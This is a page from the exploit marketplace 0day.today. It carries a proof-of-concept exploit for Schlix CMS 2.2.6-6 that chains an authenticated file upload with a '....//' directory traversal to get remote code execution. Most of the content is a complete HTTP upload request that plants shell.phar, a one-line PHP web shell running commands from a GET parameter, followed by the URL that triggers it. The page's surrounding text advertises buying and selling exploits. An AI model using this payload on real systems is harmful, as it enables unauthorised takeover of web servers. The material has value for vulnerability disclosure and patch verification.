0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Schlix CMS 2.2.6-6 - Arbitary File Upload And Directory Traversal Leads To Remote Code Execution
# Exploit Title: Schlix CMS 2.2.6-6 - Arbitary File Upload And Directory Traversal Leads To RCE (Authenticated) # Exploit Author: Emir Polat # Vendor Homepage: https://www.schlix.com/ # Software Link: https://www.schlix.com/html/schlix-cms-downloads.html # Version: 2.2.6-6 # Tested On: Ubuntu 20.04 (Firefox) ############################################################################################################ Summary: An authorized user can upload a file with a .phar extension to a path of his choice and control the content as he wishes. This causes RCE vulnerability. For full technical details and source code analysis: https://anatolias.medium.com/schlix-cms-v2-2-6-6-c17c5b2f29e. ############################################################################################################ PoC: 1-) Login to admin panel with true credentials and go to "Tools -> Mediamanager" menu from left side. 2-) Click the "Upload File" and upload a file and catch the request with Burp. 3-) Change the "uploadstartpath", "filename" and file content as follows. # Request POST /schlix/admin/app/core.mediamanager?&ajax=1&action=upload HTTP/1.1 Host: vulnerable-server Content-Length: 846 X-Schlix-Ajax: 1 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybllOFLruz1WAs7K2 Accept: */* Origin: http:// <http://10.211.55.4/>vulnerable-server Referer: http://vulnerable-server/schlix/admin/app/core.mediamanager <http://10.211.55.4/schlix/admin/app/core.mediamanager> Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: core-mediamanager_currentCategory=%2Fmedia%2Fpdf; schlix-your-cookie;__atuvc=5%7C20; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2 Connection: close ------WebKitFormBoundarybllOFLruz1WAs7K2 Content-Disposition: form-data; name="_csrftoken" {your_csrf_token} ------WebKitFormBoundarybllOFLruz1WAs7K2 Content-Disposition: form-data; name="uploadstartpath" /media/docs/....//....//....//....//system/images/avatars/large/ ------WebKitFormBoundarybllOFLruz1WAs7K2 Content-Disposition: form-data; name="filedata[]"; filename="shell.phar" <?PHP system($_GET['rce']);?> ------WebKitFormBoundarybllOFLruz1WAs7K2 Content-Disposition: form-data; name="MAX_FILE_SIZE" 2097152 ------WebKitFormBoundarybllOFLruz1WAs7K2 Content-Disposition: form-data; name="filedata__total_file_size" 0 ------WebKitFormBoundarybllOFLruz1WAs7K2 Content-Disposition: form-data; name="filedata__max_file_count" 20 ------WebKitFormBoundarybllOFLruz1WAs7K2-- 4-) Go to "vulnerable-server/schlix/system/images/avatars/large/shell.phar?rce=ls". # 0day.today [2024-07-05] #